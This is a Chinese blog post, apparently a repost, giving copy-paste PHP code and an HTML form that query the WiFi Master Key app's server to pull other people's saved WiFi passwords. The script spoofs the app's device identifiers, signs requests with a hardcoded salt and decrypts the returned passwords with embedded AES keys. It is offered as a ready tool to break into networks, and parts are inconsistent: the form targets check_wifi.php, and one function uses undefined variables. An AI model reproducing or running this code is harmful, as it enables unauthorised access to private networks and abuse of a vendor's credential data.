• PHP破解wifi密码(wifi万能钥匙的接口)


    新建wifi.php,复制粘贴

    <?php
    $bssid = $_POST["bssid"] ;
    $ssid = $_POST["ssid"] ;
    if (isset( $bssid ) && isset( $ssid )){
    //update salt
       $ret = request( $bssid , $ssid , md5(rand(1, 10000)));
       $ret = json_decode( $ret );
       $ret = request( $bssid , $ssid , $ret ->retSn);
       $ret = json_decode( $ret );
       if ( $ret ->retCd == 0){
         if ( $ret ->qryapwd->retCd == 0){
           $list = $ret ->qryapwd->psws;
           foreach ( $list as $wifi ){
             echo 'SSID: ' . $wifi ->ssid. "<br>" ;
             echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ;
             echo 'BSSID: ' . $wifi ->bssid. "<br>" ;
             if ( $wifi ->xUser){
               echo 'xUser: ' . $wifi ->xUser. "<br>" ;
               echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;
             }
           }
         }
         else {
           echo $ret ->qryapwd->retMsg;
         }
       }
    }
    function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
       $data = array ();
       $data [ 'appid' ] = '0008' ;
       $data [ 'bssid' ] = $bssid ;
       $data [ 'chanid' ] = 'gw' ;
       $data [ 'dhid' ] = $dhid ;
       $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;
       $data [ 'lang' ] = 'cn' ;
       $data [ 'mac' ] = '60f81dad28dh' ;
       $data [ 'method' ] = 'getDeepSecChkSwitch' ;
       $data [ 'pid' ] = 'qryapwd:commonswitch' ;
       $data [ 'ssid' ] = $ssid ;
       $data [ 'st' ] = 'm' ;
       $data [ 'uhid' ] = 'a0000000000000000000000000000002' ;
       $data [ 'v' ] = '324' ;
       $data [ 'sign' ] = sign( $data , $salt );
       $curl = curl_init();
       curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );
       curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );
       curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
       curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
       curl_setopt( $curl , CURLOPT_POST, true); // enable posting
       curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images
       curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
       $r = curl_exec( $curl );
       curl_close( $curl );
       return $r ;
    }
    function registerNewDevice(){
       $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;
       $data = array ();
       $data [ 'appid' ] = '0008' ;
       $data [ 'bssid' ] = $bssid ;
       $data [ 'chanid' ] = 'gw' ;
       $data [ 'dhid' ] = $dhid ;
       $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;
       $data [ 'lang' ] = 'cn' ;
       $data [ 'mac' ] = '60f81dad28de' ;
       $data [ 'method' ] = 'getDeepSecChkSwitch' ;
       $data [ 'pid' ] = 'qryapwd:commonswitch' ;
       $data [ 'ssid' ] = $ssid ;
       $data [ 'st' ] = 'm' ;
       $data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
       $data [ 'v' ] = '324' ;
       $data [ 'sign' ] = sign( $data , $salt );
    }
    function sign( $array , $salt ){
       // 签名算法
       $request_str = '' ;
       // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort
       ksort( $array );
       foreach ( $array as $key => $value ) {
         $request_str .= $value ;
       }
       $sign = md5( $request_str . $salt );
       return strtoupper ( $sign );
    }
    function decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){
       //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
       //[length][password][timestamp]
       $decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
       
       return substr (trim( $decrypted_string ),3,-13);
    } ?>

    新建index.html,复制粘贴

    <form action="check_wifi.php" method="post">

      <p>WiFi的名称ssid: <input type="text" name="ssid" /></p>

      <p>mac地址bssid: <input type="text" name="bssid" /></p>

      <input type="submit" value="提交" />

    </form>

    不要问我Mac地址怎么获取。。。就这吧

    文章来源:微笔记_博客

  • 相关阅读:
    【2020-07-04】人生十三信条
    【2020-07-03】人生十三信条
    【2020-07-02】人生十三信条
    【2020-07-01】人生十三信条
    【一句日历】2020年7月
    团队第三次作业评分 需求规格说明书
    软工评分工具
    中期成绩汇总
    软件工程第四次作业评分
    软件工程第五次作业评分
  • 原文地址:https://www.cnblogs.com/www-vnote-net/p/6077810.html
Copyright © 2020-2023  润新知